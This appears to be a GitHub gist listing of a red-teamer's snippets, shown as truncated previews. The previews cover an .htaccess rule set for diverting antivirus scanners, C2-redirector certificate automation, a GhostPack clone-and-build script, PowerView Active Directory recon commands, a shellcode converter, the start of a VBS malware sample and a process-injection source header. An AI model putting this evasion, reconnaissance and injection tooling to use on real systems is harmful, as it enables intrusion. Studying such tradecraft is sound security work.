S sunnyneo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} |
sunnyneo
/ .htaccess
Created
May 4, 2018 13:07
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
| RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
| RewriteCond expr "-R '52.0.0.0/8'" [OR] |
sunnyneo
/ get-build-ghostpack.ps1
Created
August 25, 2018 09:10
Clone all repositories in GhostPack and Build Them
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get repositories git url and clone them | |
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | |
| $req = 'https://api.github.com/users/GhostPack/repos?page=$PAGE&per_page=100' | |
| $respObj = Invoke-WebRequest $req | ConvertFrom-Json | |
| $respObj | select -Property git_url | ForEach { git clone $_.git_url -q } | |
| # Replace all Build Output to current location | |
| Get-ChildItem '*.csproj' -Recurse | ForEach { | |
| (Get-Content $_ | ForEach { $_ -replace '<OutputPath>bin\\Release\\<\/OutputPath>', '<OutputPath>..\..\</OutputPath>' }) | | |
| Set-Content $_ |
sunnyneo
/ automate_letsencrypt.sh
Last active
May 15, 2022 01:01
Automate LetsEncrypt file and Apache configurations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Refs: | |
| # https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/ | |
| # https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh | |
| # http://stackoverflow.com/questions/11617210/how-to-properly-import-a-selfsigned-certificate-into-java-keystore-that-is-avail | |
| # https://www.digitalocean.com/community/tutorials/how-to-secure-apache-with-let-s-encrypt-on-ubuntu-14-04 | |
| # http://www.advancedpentest.com/help-malleable-c2 | |
| # https://maximilian-boehm.com/hp2121/Create-a-Java-Keystore-JKS-from-Let-s-Encrypt-Certificates.htm | |
| # ./automate_letsencrypt.sh DOMAIN_NAME_TO_GENERATE_CERT IP_TO_BE_REDIRECTED TO |
sunnyneo
/ PowerView-3.0-tricks.ps1
Created
September 9, 2018 03:05
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
sunnyneo
/ PowerView-2.0-tricks.ps1
Created
September 9, 2018 03:05
— forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
sunnyneo
/ ConvertShellcode.py
Created
December 15, 2018 06:31
— forked from rvrsh3ll/ConvertShellcode.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import sys | |
| file_name = sys.argv[1] | |
| with open (file_name) as f: | |
| hexdata = binascii.hexlify(f.read()) | |
| hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
| shellcode = '' | |
| for i in hexlist: | |
| shellcode += "0x{},".format(i) |
sunnyneo
/ ConvertShellcode.py
Created
December 15, 2018 06:31
— forked from rvrsh3ll/ConvertShellcode.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import sys | |
| file_name = sys.argv[1] | |
| with open (file_name) as f: | |
| hexdata = binascii.hexlify(f.read()) | |
| hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
| shellcode = '' | |
| for i in hexlist: | |
| shellcode += "0x{},".format(i) |
sunnyneo
/ fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
Created
July 7, 2019 17:18
— forked from JohnLaTwC/fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36
VBS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Uploaded by @JohnLaTwC | |
| ## Sample hash: fd334bb96b496592db6c9771f305a2ddca6610a59c6d45f5bbbb2b38859b4f36 | |
| On Error Resume Next | |
| Dim objShell : Set objShell = CreateObject("WScript.Shell") | |
| If LCase(Right(WScript.FullName, 11)) = "wscript.exe" Then | |
| For Each vArg In WScript.Arguments | |
| sArgs = sArgs & " """ & vArg & """" | |
| Next | |
| objShell.Run("cmd.exe /k cscript.exe //nologo " & Chr(34) & WScript.ScriptFullName & Chr(34) & sArgs & " && exit") |
sunnyneo
/ inject.c
Created
July 24, 2019 07:33
— forked from hfiref0x/inject.c
Process Doppelgänging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Ref = src | |
| // https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
| // | |
| // Credits: | |
| // Vyacheslav Rusakov @swwwolf | |
| // Tom Bonner @thomas_bonner | |
| // | |
| #include <Windows.h> |
OlderNewer